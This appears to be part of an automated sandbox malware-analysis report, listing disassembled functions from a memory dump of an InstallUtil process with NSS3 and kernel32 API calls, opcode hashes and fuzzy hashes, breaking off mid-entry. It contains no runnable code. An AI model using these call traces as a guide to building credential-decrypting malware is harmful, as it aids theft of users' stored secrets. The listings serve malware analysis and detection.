                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_logstrlen
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
                                                                                                                  • API String ID: 3619038524-4115156624
                                                                                                                  • Opcode ID: 5664e7da3ee60adc2f2db0bd8c2b30cd6735a3111316c4c8cb4dae3182667623
                                                                                                                  • Instruction ID: d1b3635588b2165ca6329bc98d2f25b355aac58d4c98ea3ec087bd3a61bc4c97
                                                                                                                  • Opcode Fuzzy Hash: 5664e7da3ee60adc2f2db0bd8c2b30cd6735a3111316c4c8cb4dae3182667623
                                                                                                                  • Instruction Fuzzy Hash: D271ADB160420A9BEB00CF15CD80FAA77B5FB88308F0A4524ED199BB91D331ED55CBA5
                                                                                                                  Function 6C742D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __allrem
                                                                                                                  • String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
                                                                                                                  • API String ID: 2933888876-3221253098
                                                                                                                  • Opcode ID: 9f547dab64b20f61a0b6b7b9e70b2fcaf8ad0a4f2023f961f1d45bee8b6b3217
                                                                                                                  • Instruction ID: c49580bc610c7baa71e380ea4f749d9605e89828cc610c4e0374ea723ed34450
                                                                                                                  • Opcode Fuzzy Hash: 9f547dab64b20f61a0b6b7b9e70b2fcaf8ad0a4f2023f961f1d45bee8b6b3217
                                                                                                                  • Instruction Fuzzy Hash: 1161BE71B002059FDB54CF68D998A6A77B5FF89318F10853CE919DB790DB31AC16CB90
                                                                                                                  Function 6C79AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C79AB3E,?,?,?), ref: 6C79AC35
                                                                                                                    • Part of subcall function 6C77CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C77CF16
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C79AB3E,?,?,?), ref: 6C79AC55
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B10F3
                                                                                                                    • Part of subcall function 6C7B10C0: EnterCriticalSection.KERNEL32(?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B110C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1141
                                                                                                                    • Part of subcall function 6C7B10C0: PR_Unlock.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1182
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B119C
                                                                                                                  • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C79AB3E,?,?), ref: 6C79AC70
                                                                                                                    • Part of subcall function 6C77E300: TlsGetValue.KERNEL32 ref: 6C77E33C
                                                                                                                    • Part of subcall function 6C77E300: EnterCriticalSection.KERNEL32(?), ref: 6C77E350
                                                                                                                    • Part of subcall function 6C77E300: PR_Unlock.NSS3(?), ref: 6C77E5BC
                                                                                                                    • Part of subcall function 6C77E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C77E5CA
                                                                                                                    • Part of subcall function 6C77E300: TlsGetValue.KERNEL32 ref: 6C77E5F2
                                                                                                                    • Part of subcall function 6C77E300: EnterCriticalSection.KERNEL32(?), ref: 6C77E606
                                                                                                                    • Part of subcall function 6C77E300: PORT_Alloc_Util.NSS3(?), ref: 6C77E613
                                                                                                                  • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C79AC92
                                                                                                                  • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C79AB3E), ref: 6C79ACD7
                                                                                                                  • PORT_Alloc_Util.NSS3(?), ref: 6C79AD10
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C79AD2B
                                                                                                                    • Part of subcall function 6C77F360: TlsGetValue.KERNEL32(00000000,?,6C79A904,?), ref: 6C77F38B
                                                                                                                    • Part of subcall function 6C77F360: EnterCriticalSection.KERNEL32(?,?,?,6C79A904,?), ref: 6C77F3A0
                                                                                                                    • Part of subcall function 6C77F360: PR_Unlock.NSS3(?,?,?,?,6C79A904,?), ref: 6C77F3D3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2926855110-0
                                                                                                                  • Opcode ID: 2c4bc1b58c22e7e4722086bd0509a18a3d09844759d5f9eb4168407cb10cfbfb
                                                                                                                  • Instruction ID: be7627ffdf5a18d189542d554625b24b4b4555e592f2600d09289c185f2ca132
                                                                                                                  • Opcode Fuzzy Hash: 2c4bc1b58c22e7e4722086bd0509a18a3d09844759d5f9eb4168407cb10cfbfb
                                                                                                                  • Instruction Fuzzy Hash: 8D315CB1E012095FEB00CF69DE459AF77B6EF85328B188538E8145BB40EB30DC0587A1
                                                                                                                  Function 6C778C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_Now.NSS3 ref: 6C778C7C
                                                                                                                    • Part of subcall function 6C819DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C860A27), ref: 6C819DC6
                                                                                                                    • Part of subcall function 6C819DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C860A27), ref: 6C819DD1
                                                                                                                    • Part of subcall function 6C819DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C819DED
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C778CB0
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C778CD1
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C778CE5
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C778D2E
                                                                                                                  • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C778D62
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C778D93
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3131193014-0
                                                                                                                  • Opcode ID: 7841a67fbee11a2b48a032dec7f5b271f75601689c74d594604c9ac9d8c922f7
                                                                                                                  • Instruction ID: 7ed2d331ec4ed2279861a2853143e956c32c4a40933f2deb69c6f46906b8001f
                                                                                                                  • Opcode Fuzzy Hash: 7841a67fbee11a2b48a032dec7f5b271f75601689c74d594604c9ac9d8c922f7
                                                                                                                  • Instruction Fuzzy Hash: B5316A71A00209AFDF209F68DE467AAB7B0FF59318F140136EA1577B50D770A924C7E1
                                                                                                                  Function 6C798500 Relevance: 10.6, APIs: 7, Instructions: 104memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(6C7995DC,00000000,00000000,00000000,?,6C7995DC,00000000,00000000,?,6C777F4A,00000000,?,00000000,00000000), ref: 6C798517
                                                                                                                    • Part of subcall function 6C7ABE30: SECOID_FindOID_Util.NSS3(6C76311B,00000000,?,6C76311B,?), ref: 6C7ABE44
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800,00000000,00000000,?,6C777F4A,00000000,?,00000000,00000000), ref: 6C798585
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,00000034,?,00000000,00000000,?,6C777F4A,00000000,?,00000000,00000000), ref: 6C79859A
                                                                                                                  • SEC_ASN1DecodeItem_Util.NSS3(00000000,00000000,6C87D8C4,6C7995D0,?,?,?,00000000,00000000,?,6C777F4A,00000000,?,00000000,00000000), ref: 6C7985CC
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(-0000001C,?,?,?,?,?,?,?,00000000,00000000,?,6C777F4A,00000000,?,00000000,00000000), ref: 6C7985E1
                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,00000000,00000000,?,6C777F4A,00000000,?), ref: 6C7985F4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$AlgorithmArena_Tag_$Alloc_ArenaDecodeFindFreeItem_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 738345241-0
                                                                                                                  • Opcode ID: c8f2c8fa82ecf6b9c15f685af1405d9a04f2329a144fb1bde7c89c423011e606
                                                                                                                  • Instruction ID: fdfda05b3a95a6edfddba2ed911ba07895acf25825ca07e68a86b60f0075eebd
                                                                                                                  • Opcode Fuzzy Hash: c8f2c8fa82ecf6b9c15f685af1405d9a04f2329a144fb1bde7c89c423011e606
                                                                                                                  • Instruction Fuzzy Hash: 02317BA2D4120057F3108928FF98BAA3228AB2139CF150773F815DFFC3FB20D95582A2
                                                                                                                  Function 6C764590 Relevance: 10.6, APIs: 7, Instructions: 100memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C7645B5
                                                                                                                    • Part of subcall function 6C7B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7587ED,00000800,6C74EF74,00000000), ref: 6C7B1000
                                                                                                                    • Part of subcall function 6C7B0FF0: PR_NewLock.NSS3(?,00000800,6C74EF74,00000000), ref: 6C7B1016
                                                                                                                    • Part of subcall function 6C7B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7587ED,00000008,?,00000800,6C74EF74,00000000), ref: 6C7B102B
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C7645C9
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B10F3
                                                                                                                    • Part of subcall function 6C7B10C0: EnterCriticalSection.KERNEL32(?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B110C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1141
                                                                                                                    • Part of subcall function 6C7B10C0: PR_Unlock.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1182
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B119C
                                                                                                                  • memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7645E6
                                                                                                                  • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C7645F8
                                                                                                                    • Part of subcall function 6C7AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7A8D2D,?,00000000,?), ref: 6C7AFB85
                                                                                                                    • Part of subcall function 6C7AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7AFBB1
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C764647
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C87A0F4,?), ref: 6C76468C
                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7646A1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpymemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1594507116-0
                                                                                                                  • Opcode ID: 85576a21c17f172c511a3c7a2f7ecfee58a5640bdd79b2bfb84c65b4e06df7e5
                                                                                                                  • Instruction ID: 2668aa304753be50a43c6a2cee77851344aa9e8fd647117d9850dc91e302ef61
                                                                                                                  • Opcode Fuzzy Hash: 85576a21c17f172c511a3c7a2f7ecfee58a5640bdd79b2bfb84c65b4e06df7e5
                                                                                                                  • Instruction Fuzzy Hash: D031D8B1A003159BFF208E59DE65BAB36A4AB45318F004438DD05EFF81E775C80887A6
                                                                                                                  Function 6C772E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C76E728,?,00000038,?,?,00000000), ref: 6C772E52
                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C772E66
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C772E7B
                                                                                                                  • EnterCriticalSection.KERNEL32(00000000), ref: 6C772E8F
                                                                                                                  • PL_HashTableLookup.NSS3(?,?), ref: 6C772E9E
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C772EAB
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C772F0D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3106257965-0
                                                                                                                  • Opcode ID: 2b276675be0f6c302f13d24a2f2ec91ba6515c215f0d306b374cbbe4be3f3e02
                                                                                                                  • Instruction ID: dd885b3a5f6ab1896a9ac2112bc020d69806bf25ddde75e95f01068164f1b693
                                                                                                                  • Opcode Fuzzy Hash: 2b276675be0f6c302f13d24a2f2ec91ba6515c215f0d306b374cbbe4be3f3e02
                                                                                                                  • Instruction Fuzzy Hash: 2631D375A00509ABEF215F69D94887AB778EF1525CB048174EC1887B11FB31DC64C7E1
                                                                                                                  Function 6C7A4470 Relevance: 10.6, APIs: 7, Instructions: 82COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(00000000,?,6C767296,00000000), ref: 6C7A4487
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,6C767296,00000000), ref: 6C7A44A0
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,6C767296,00000000), ref: 6C7A44BB
                                                                                                                  • SECMOD_DestroyModule.NSS3(?,?,?,?,6C767296,00000000), ref: 6C7A44DA
                                                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,?,6C767296,00000000), ref: 6C7A4530
                                                                                                                  • free.MOZGLUE(?,?,?,?,?,6C767296,00000000), ref: 6C7A453C
                                                                                                                  • PORT_FreeArena_Util.NSS3 ref: 6C7A454F
                                                                                                                    • Part of subcall function 6C78CAA0: PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6C76B1EE,D958E836,?,6C7A51C5), ref: 6C78CAFA
                                                                                                                    • Part of subcall function 6C78CAA0: PR_UnloadLibrary.NSS3(?,6C7A51C5), ref: 6C78CB09
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$Arena_DeleteDestroyEnterFreeLibraryModuleSecureUnloadUnlockUtilValuefree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3590924995-0
                                                                                                                  • Opcode ID: 31fe2b658dce8291c8a822ca8c8ea4a874d213dc375ed968da92abf60b2c9349
                                                                                                                  • Instruction ID: de547dcb7e248d63eebc8a01457549a8c9a1e760de12949de5381cf45b03a57b
                                                                                                                  • Opcode Fuzzy Hash: 31fe2b658dce8291c8a822ca8c8ea4a874d213dc375ed968da92abf60b2c9349
                                                                                                                  • Instruction Fuzzy Hash: 18315274A04A019FDB10AFB9C188669B7F0FF05358F015639D89997B01EB32E855DBC2
                                                                                                                  Function 6C7BCEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PORT_ArenaMark_Util.NSS3(?,6C7BCD93,?), ref: 6C7BCEEE
                                                                                                                    • Part of subcall function 6C7B14C0: TlsGetValue.KERNEL32 ref: 6C7B14E0
                                                                                                                    • Part of subcall function 6C7B14C0: EnterCriticalSection.KERNEL32 ref: 6C7B14F5
                                                                                                                    • Part of subcall function 6C7B14C0: PR_Unlock.NSS3 ref: 6C7B150D
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C7BCD93,?), ref: 6C7BCEFC
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B10F3
                                                                                                                    • Part of subcall function 6C7B10C0: EnterCriticalSection.KERNEL32(?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B110C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1141
                                                                                                                    • Part of subcall function 6C7B10C0: PR_Unlock.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1182
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B119C
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C7BCD93,?), ref: 6C7BCF0B
                                                                                                                    • Part of subcall function 6C7B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B08B4
                                                                                                                  • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C7BCD93,?), ref: 6C7BCF1D
                                                                                                                    • Part of subcall function 6C7AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7A8D2D,?,00000000,?), ref: 6C7AFB85
                                                                                                                    • Part of subcall function 6C7AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7AFBB1
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C7BCD93,?), ref: 6C7BCF47
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C7BCD93,?), ref: 6C7BCF67
                                                                                                                  • SECITEM_CopyItem_Util.NSS3(?,00000000,6C7BCD93,?,?,?,?,?,?,?,?,?,?,?,6C7BCD93,?), ref: 6C7BCF78
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4291907967-0
                                                                                                                  • Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                  • Instruction ID: a38f3f1f72d81876bc52da552ceef918a8d48de9873b949711c936bd3b347160
                                                                                                                  • Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                  • Instruction Fuzzy Hash: 7811A5A6E002045BE700AE666E49B6BB5EC9F5454EF048139FC19E7741FB70D908C6B1
                                                                                                                  Function 6C768C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C768C1B
                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 6C768C34
                                                                                                                  • PL_ArenaAllocate.NSS3 ref: 6C768C65
                                                                                                                  • PR_Unlock.NSS3 ref: 6C768C9C
                                                                                                                  • PR_Unlock.NSS3 ref: 6C768CB6
                                                                                                                    • Part of subcall function 6C7FDD70: TlsGetValue.KERNEL32 ref: 6C7FDD8C
                                                                                                                    • Part of subcall function 6C7FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7FDDB4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
